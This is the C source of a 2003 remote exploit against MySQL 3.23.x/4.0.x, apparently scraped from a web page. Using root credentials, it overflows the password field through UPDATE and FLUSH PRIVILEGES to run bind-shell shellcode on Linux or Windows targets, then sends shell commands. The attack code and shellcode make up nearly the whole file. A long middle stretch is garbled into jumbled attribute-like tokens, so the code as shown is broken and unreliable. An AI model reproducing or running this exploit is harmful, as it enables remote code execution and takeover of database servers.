/*
- exp for mysql
- proof of concept
- using jmp *eax on linux
- using jmp *edx on windows
- bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com) 2003/09/12
- compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient
*/
#include
1<stdio.h>
2#include <stdlib.h>
3#include <unistd.h>
4#include <errno.h>
5#include <sys socket.h="">
6#include <sys types.h="">
7#include <sys select.h="">
8#include <netdb.h>
9#include <mysql mysql.h="">
10
11#define ROOTUSER "root"
12#define PORT 3306
13#define MYDB "mysql"
14#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"
15#define LISTUSERSQL "SELECT user,password FROM mysql.user WHERE user!='root' LIMIT 0,1"
16#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73"
17#define BUF 2048
18#define VER "2.1b2"
19#define CMD "uname -a;id\n"
20MYSQL *conn;
21char NOP[]="90";
22char linux_shellcode[]=
23"db31c03102b0c931"
24"c08580cdc3893474"
25"d231c03180cd07b0"
26"40b0c03109b180cd"
27"c031c38980cd25b0"
28"80c2fe43f07203fa"
29"14b0c031c38980cd"
30"c931c03125b009b1"
31"17b080cdc03180cd"
32"89504050b0c931e3"
33"b180cda283c889e0"
34"d0f70ae831c78940"
35"894c40c0525050e2"
36"4c8d5157db310424"
37"66b00ab3835980cd"
38"057501f874493a80"
39"31d2e209c38940c0"
40"fb8980cd3fb003b1"
41"4180cd496851f8e2"
42"68732f6e622f2f68"
43"51e389696c692d68"
44"51e28970e1895352"
45"c031d23180cd0bb0"
46;
47//bind on 53 port
48
49char win_shellcode[]=
50/*
51"4A5A10EBB966C9333480017DFAE2990A"
52"EBE805EB70FFFFFF99999895A938FDC3"
53"12999999E91295D9D912348512411291"
54"ED12A5EA6A9AE1879AB9E7128DD71262"
55"CECF74AA9AA612C8F36B12623F6AC097"
56"C6C091EDDC9D5E1AC6C0707B125412C7"
57"5A9ABDDF589A784812FF50AA85DF1291"
58"78585A9A12589A9B125A9A991A6E1263"
59"4912975F71C09AF39999991ECB945F1A"
60"65CE66CFF34112C3ED71C09CC9999999"
61"F3C9C9C9669BF398411275CE999B9E5E"
62"59AAAC99F39DDE1066CACE8998F369CE"
63"6DCE66CA66CAC9C9491261CE12DD751A"
64"F359AA6D9D10C08910627B17CF10A1CF"
65"D9CF10A5B5DF5EFFDE149898AACFC989"
66"C8C8C850C8C898F3FAA5DE5E1499FDF4"
67"C8C9A5DECB79CE66CA65CE66C965CE66"
68"AA7DCE66591C3559CBC860EC4B66CACF"
69"7B32C0C35A59AA7766677671EDFCDE66"
70"FAF6EBC9EBFDFDD899EAEAFCF8FCEBDA"
71"EBC9FCEDEAFCFAF6DC99D8EACDEDF0E1"
72"F8FCEBF1F6D599FDF0D5FDF8EBF8EBFB"
73"EE99D8E0AAC6ABEACACE99ABFAF6CAD8"
74"D8EDFCF2F7F0FB99F0F599FDF7FCEDEA"
75"FAFAF89999EDE9FCEAF6F5FAFAF6EAFC"
76"99EDFCF2";
77*/
78"EB909090334A5A107EB966C90A348001"
79"EBFAE299FFEBE8059570FFFFC3999998"
80"99A938FDD912999985E9129591D91234"
81"EA12411287ED12A5126A9AE1629AB9E7"
82"AA8DD712C8CECF74629AA61297F36B12"
83"ED3F6AC01AC6C0917BDC9D5EC7C6C070"
84"DF125412485A9ABDAA589A789112FF50"
85"9A85DF129B78585A9912589A63125A9A"
86"5F1A6E12F34912971E71C09A1A999999"
87"CFCB945FC365CE669CF3411299ED71C0"
88"C9C9999998F3C9C9CE669BF35E411275"
89"99999B9E1059AAAC89F39DDECE66CACE"
90"CA98F369C96DCE66CE66CAC91A491261"
91"6D12DD7589F359AA179D10C0CF10627B"
92"A5CF10A1FFD9CF1098B5DF5E89DE1498"
93"50AACFC9F3C8C8C85EC8C898F4FAA5DE"
94"DE1499FD66C8C9A566CB79CE66CA65CE"
95"66C965CE59AA7DCEEC591C35CFCBC860"
96"C34B66CA777B32C0715A59AA66666776"
97"C9EDFCDED8FAF6EBFCEBFDFDDA99EAEA"
98"EDF8FCEBF6EBC9FCEAEAFCFAE1DC99D8"
99"EBC9EDF0EAFCFAF6F6D599EAF0D5FDF8"
100"EBF8EBFBEE99D8E0AAC6ABEACACE99AB"
101"FAF6CAD8D8EDFCF2F7F0FB99F0F599FD"
102"F7FCEDEAFAFAF89999EDE9FCEAF6F5FA"
103"FAF6EAFC99EDFCF29090909090909090"
104;
105int win_port=53;
106int type=1;
107struct
108{
109char *os;
110u_long ret;
111int pad;
112int systemtype; //0 is linux,1 is windows
113} targets[] =
114{
115{ "linux:glibc-2.2.93-5", 0x42125b2b,19*4*2,0},
116{ "windows2000 SP3 CN",0x77e625db,9*4*2,1},
117},v;
118
119void usage(char *);
120void sqlerror(char *);
121MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname);
122
123main(int argc,char **argv)
124{
125MYSQL_RES *result;
126MYSQL_ROW row;
127char jmpaddress[8];
128char buffer[BUF],muser[20],buf2[1200];
129my_ulonglong rslines;
130struct sockaddr_in clisocket;
131int i=0,j,clifd,count,a;
132char data1,c;
133fd_set fds;
134char *server=NULL,*rootpass=NULL;
135int pad,systemtype;
136u_long jmpaddr;
137
138if(argc<3) usage(argv[0]);
139while((c = getopt(argc, argv, "d:t:p:"))!= EOF)
140{
141switch (c)
142{
143case 'd':
144server=optarg;
145break;
146case 't':
147type = atoi(optarg);
148if((type > sizeof(targets)/sizeof(v)) || (type < 1))
149usage(argv[0]);
150break;
151case 'p':
152rootpass=optarg;
153break;
154default:
155usage(argv[0]);
156return 1;
157}
158}
159if(server==NULL || rootpass==NULL)
160usage(argv[0]);
161memset(muser,0,20);
162memset(buf2,0,1200);
163pad=targets[type-1].pad;
164systemtype=targets[type-1].systemtype;
165jmpaddr=targets[type-1].ret;
166printf("@-------------------------------------------------@\n");
167printf("# Mysql 3.23.x/4.0.x remote exploit(09/13)-%s #\n",VER);
168printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
169printf("---------------------------------------------------\n");
170printf("[+] system type:%s,using ret addr:%p,pad:%d\n",(systemtype==0)?"linux":"windows",jmpaddr,pad);
171printf("[+] Connecting to mysql server %s:%d....",server,PORT);
172fflush(stdout);
173conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB);
174if(conn==NULL) exit(0);
175printf("ok\n");
176printf("[+] ALTER user column...");
177fflush(stdout);
178if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOLUMSQL))!=0)
179sqlerror("ALTER user table failed");
180//select
181printf("ok\n");
182printf("[+] Select a valid user...");
183fflush(stdout);
184if(mysql_real_query(conn,LISTUSERSQL,strlen(LISTUSERSQL))!=0)
185sqlerror("select user from table failed");
186result=mysql_store_result(conn);
187if(result==NULL)
188sqlerror("store result error");
189rslines=mysql_num_rows(result);
190if(rslines==0)
191sqlerror("Cannot find a user");
192row=mysql_fetch_row(result);
193snprintf(muser,19,"%s",row[0]);
194printf("ok\n");
195printf("[+] Found a user:%s,password:%s\n",muser,row[1]);
196memset(buffer,0,BUF);
197i=sprintf(buffer,"update user set password='");
198sprintf(jmpaddress,"%x",jmpaddr);
199jmpaddress[8]=0;
200for(j=0;j<pad-4;j+=2) ",muser);="" #\n",ver);="" &fds))="" &fds);="" &fds,="" (count="" (errno="EINTR)" (fd_isset(0,="" (fd_isset(clifd,="" (select(clifd+1,="" (write(1,="" (write(clifd,="" *)&clisocket,&j)="-1)" *s)="" -d="" 0)="" 0:="" 13)-%s="" 1:="" 3.23.x="" 4.0.x="" ;="" <="0)" <host="" @\n");="" a="" a;="" bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com="" break;="" buf);="" buffer,="" buffer[buf];="" by="" cannot="" case="" char="" client="" client_connect(clifd,server,win_port);="" clifd="socket(AF_INET,SOCK_STREAM,0);" clifd)="" continue;="" count="read(clifd," count)="" count;="" data1="I" default:="" error");="" execsh(clifd);="" execsh(int="" exit(0);="" exploit(09="" fd="" fd_set="" fd_set(0,="" fd_set(clifd,="" fd_zero(&fds);="" fds;="" fflush(stdout);="" find="" finding="" for="" for(clifd="3;clifd<256;clifd++)" get="" here="" i'll="" i+="sprintf(buffer+i,"'" if="" if(clifd="256)" if(clisocket.sin_port="htons(PORT))" if(getpeername(clifd,(struct="" if(j%8)="" if(mysql_real_query(conn,buffer,i)!="0)" if(mysql_real_query(conn,flushsql,strlen(flushsql))!="0)" if(send(clifd,&data1,1,msg_oob)<1)="" if(systemtype="1)" int="" j="sizeof(clisocket);" length:%d\n",strlen(buf2));="" let="" memcpy(buf2+j,"06eb",4);="" memcpy(buf2+j,nop,2);="" memcpy(buf2+pad+8,linux_shellcode,strlen(linux_shellcode));="" memcpy(buf2+pad+8,win_shellcode,strlen(win_shellcode));="" memcpy(buf2+pad,jmpaddress,8);="" memcpy(buffer+i,buf2,strlen(buf2));="" memset(buf2+strlen(buf2),'a',count);="" memset(buffer,0,buf);="" modified="" mysql="" mysql_close(conn);="" mysql_free_result(result);="" not="" null)="" null,="" oob.......");="" overflow="" password="" password...");="" perror("error");="" printf("#="" printf("---------------------------------------------------\n");="" printf("@="" printf("@-------------------------------------------------@\n");="" printf("[+]="" printf("[-]="" printf("failed\n[-]="" printf("ok\n");="" printf("ok\r\n");="" printf("usage:%s="" remote="" result="" send(clifd,cmd,sizeof(cmd),0);="" send(clifd,flushsql,sizeof(flushsql),0);="" sending="" server="" server....");="" shell.....");="" shell.....\n");="" sockaddr="" socket="" socket......");="" socket\n");="" socketfd:%d\n",clifd);="" sqlerror("flush="" sqlerror("modified="" support="" switch(systemtype)="" systemtype\n");="" this="" usage(char="" user="%s" void="" waiting="" where="" while(1)="" write(2,buffer,i);="" {="" }=""> -p <root_pass> -t <type>\n",s);
201printf(" -d target host ip/name\n");
202printf(" -p 'root' user paasword\n");
203printf(" -t type [default:%d]\n",type);
204printf(" ------------------------------\n");
205for(a = 0; a < sizeof(targets)/sizeof(v); a++)
206printf(" %d [0x%.8x]: %s\n", a+1, targets[a].ret, targets[a].os);
207printf("\n");
208exit(0);
209}
210MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname)
211{
212MYSQL *connect;
213connect=mysql_init(NULL);
214if(connect==NULL)
215{
216printf("FAILED\n[-] init mysql failed:%s\n",mysql_error(connect));
217return NULL;
218}
219if(mysql_real_connect(connect,server,user,pass,dbname,port,NULL,0)==NULL)
220{
221printf("FAILED\n[-] Error: %s\n",mysql_error(connect));
222return NULL;
223}
224return connect;
225
226}
227void sqlerror(char *s)
228{
229fprintf(stderr,"FAILED\n[-] %s:%s\n",s,mysql_error(conn));
230mysql_close(conn);
231exit(0);
232}
233
234int client_connect(int sockfd,char* server,int port)
235{
236struct sockaddr_in cliaddr;
237struct hostent *host;
238
239if((host=gethostbyname(server))==NULL)
240{
241printf("gethostbyname(%s) error\n",server);
242return(-1);
243}
244
245bzero(&cliaddr,sizeof(struct sockaddr));
246cliaddr.sin_family=AF_INET;
247cliaddr.sin_port=htons(port);
248cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
249printf("[+] Trying %s:%d....",server,port);
250fflush(stdout);
251if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
252{
253printf("error:%s\r\n",strerror(errno));
254return(-1);
255}
256printf("ok\r\n");
257return(0);
258}</type></root_pass></pad-4;j+=2)></mysql></netdb.h></sys></sys></sys></errno.h></unistd.h></stdlib.h></stdio.h>